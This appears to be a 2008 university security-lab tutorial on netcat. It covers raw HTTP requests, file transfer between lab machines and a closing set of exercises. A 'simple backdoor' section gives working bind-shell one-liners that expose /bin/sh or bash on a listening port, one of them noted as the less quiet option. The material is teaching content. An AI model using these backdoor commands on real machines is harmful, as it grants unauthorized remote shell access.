Netcat is described as the swiss army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security. It's not the optimal tool for many jobs, but it's a lot quicker to use than reinventing the wheel.
Netcat's most simplistic function can be seen as a replacement to telnet. Try the following:
$ nc www.northwestern.edu 80 GET / HTTP/1.1^M Host: www.northwestern.edu^M ^M
Where it says ^M, you actually have to press
control-v and then
enter. This is to produce a carriage return as required by HTTP. Optionally, you can add more headers to your request:
$ nc www.northwestern.edu 80 GET / HTTP/1.1^M Host: www.northwestern.edu^M Accept: text/html;q=0.9,text/plain;q=0.8^M User-Agent: Mozilla/5.0 (Unknown; en-us)^M Accept-Language: en-us,en;q=0.5^M ^M
Another way to do this (which allows you to avoid pressing
control-v all the time) is to pipe the output of some command to netcat. Here's an example:
$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80
Common command line flags
-lSets up netcat to listen for incoming TCP connections. You'll want to use this in conjunction with the
-pSpecifies a port for netcat to listen on.
-vvSets the verbosity level
-nDisables IP resolution
-eExecute a command
One thing you might come across is a host you can access, but it's hard to get files onto their machine. Netcat can easily transfer files for you. On the machine that you want to receive the file:
$ nc -vv -l 3000 > file
And on the machine from which you want to send the file:
$ nc -vv hostname 3000 < file
These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transfering a file from a machine in the Wilkinson lab to hamsa.
Creating a simple backdoor
Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine.
$ nc -l -p 5300 -e /bin/sh
And now from any machine:
$ nc target_ip 5300
However, the -e flag has been deprecated in more recent versions of netcat. You can emulate this behavior with something like the following, though it's not as quiet:
$ mkfifo foo; nc -l 5300 0<foo | /bin/bash 1>foo
There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (
man netcat) or to search online for things to try with it.
Show that you can successfully download the webpage www.google.com. Transfer an arbitrary file using netcat. Show that you can crete a netcat backdoor and demonstrate an understanding of netcat's usefulness as a TCP client and server.
Copyright 2008 the following:
Sam McIngvale email@example.com
Jim Spadaro firstname.lastname@example.org
Whitney Young email@example.com
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.